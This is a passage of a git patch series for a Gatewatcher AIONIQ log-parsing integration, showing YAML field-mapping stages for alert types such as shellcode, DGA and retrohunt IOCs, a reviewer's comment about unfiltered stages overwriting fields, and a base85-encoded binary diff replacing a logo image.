'{{json_load.message.encodings}}' + gatewatcher.sample_id: '{{json_load.message.sample_id}}' + gatewatcher.sub_type: '{{json_load.message.sub_type}}' + filter: '' + name: set + fileinfo: + actions: + - set: + gatewatcher.filemagic: '{{json_load.message.fileinfo.magic}}' + filter: '' + name: set + dga: + actions: + - set: + gatewatcher.type: '{{json_load.message.type}}' + gatewatcher.domain_name: '{{json_load.message.domain_name}}' + gatewatcher.probability: '{{json_load.message.probability}}' + gatewatcher.matched_event: '{{json_load.message.matched_event}}' + filter: '' + name: set + retrohunt: + actions: + - set: + gatewatcher.tlp: '{{json_load.message.tlp}}' + gatewatcher.ttp: '{{json_load.message.ttp}}' + gatewatcher.risk: '{{json_load.message.risk}}' + gatewatcher.ioc_id: '{{json_load.message.ioc_id}}' + gatewatcher.case_id: '{{json_load.message.case_id}}' + gatewatcher.families: '{{json_load.message.families}}' + gatewatcher.ioc_tags: '{{json_load.message.ioc_tags}}' + gatewatcher.ioc_type: '{{json_load.message.ioc_type}}' + gatewatcher.campaigns: '{{json_load.message.campaigns}}' + gatewatcher.ioc_value: 
'{{json_load.message.ioc_value}}' + gatewatcher.meta_data: '{{json_load.message.meta_data}}' + gatewatcher.relations: '{{json_load.message.relations}}' + gatewatcher.signature: '{{json_load.message.signature}}' + gatewatcher.categories: '{{json_load.message.categories}}' + gatewatcher.usage_mode: '{{json_load.message.usage_mode}}' + gatewatcher.description: '{{json_load.message.description}}' + gatewatcher.probability: '{{json_load.message.probability}}' + gatewatcher.threat_actor: '{{json_load.message.threat_actor}}' + gatewatcher.matched_event: '{{json_load.message.matched_event}}' + gatewatcher.external_links: '{{json_load.message.external_links}}' + gatewatcher.vulnerabilities: '{{json_load.message.vulnerabilities}}' + gatewatcher.ioc_updated_date: '{{json_load.message.ioc_updated_date}}' + gatewatcher.targeted_sectors: '{{json_load.message.targeted_sectors}}' + gatewatcher.ioc_creation_date: '{{json_load.message.ioc_creation_date}}' + gatewatcher.kill_chain_phases: '{{json_load.message.kill_chain_phases}}' + gatewatcher.timestamp_package: '{{json_load.message.timestamp_package}}' + gatewatcher.matched_event_type: '{{json_load.message.matched_event_type}}' + gatewatcher.targeted_countries: '{{json_load.message.targeted_countries}}' + gatewatcher.targeted_platforms: '{{json_load.message.targeted_platforms}}' + gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}' + filter: '' + name: set + From bd91e163ea94ffb1b8da95ec96fcbcbc74eb760b Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 4 Sep 2024 15:43:28 +0200 Subject: [PATCH 003/317] New logo --- GateWatcher/aioniq/_meta/logo.png | Bin 20110 -> 16628 bytes 1 file changed, 0 insertions(+), 0 deletions(-) 
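Review bot: The five stages added to `pipeline` (`powershell`, `shellcode`, `fileinfo`, `dga`, `retrohunt`) declare `filter: ''`, whereas `malcore` and `suricata` are gated on `json_load.message.type`, so every event runs through all of them regardless of its kind. Concretely, `event.module` is written by both the `powershell` stage (from `sub_type`) and the `shellcode` stage (from `event_type`) on every record, and `dga` re-sets `gatewatcher.type` that `common` already set, so the last stage to run wins; whether an empty template leaves the field unset or sets it to an empty string depends on the engine and is not visible here, so the collision may be masked in tests that carry only one event kind. Each stage should be gated on the discriminator the smart descriptions match on, e.g. `filter: '{{json_load.message.event_type == "powershell"}}'` for `powershell` and the corresponding value for the other four; whether the source puts the kind in `type` or `event_type` should be confirmed against sample events before choosing the key.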
diff --git a/GateWatcher/aioniq/_meta/logo.png b/GateWatcher/aioniq/_meta/logo.png index 0961df25ca068c6ba4a6d563e52897caec9ac8a4..f8b45a6a754e6f75f7bbb1c2e2d8a40a08c67aae 100644 GIT binary patch literal 16628 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 Zg53KJdXMw57+eXUDEn5XO3F0k{{to~p(+3X literal 20110 zcmeFYWmH_Aw)|yqdI!;Sd85fHZ3keAcS5-wp2k}4auNMXy z;;#h2?FSMPsk=Yez*EQEhu+oQ#m3Ijn%>jT)tcVg*UknB$#<##y`4LCb86Jn7O@oa z^|pw?GeVCD(Y}8DZ!cKmT4)NN%iBX|Oi+JbWT6y1oIV-f;Pn9HbPgi%tRI5ECrSOyW zW(yNuHe6Zlm$!L7so}2cUf@Ec{{E0BQ1c4oFRrMr){p!1horTUjZ11Ls-8cRqUQC} z3U)QWK7Z6}DeWR_0P9RBHUTuz_y48Jx}v_j3@f2Q@%OYDgN 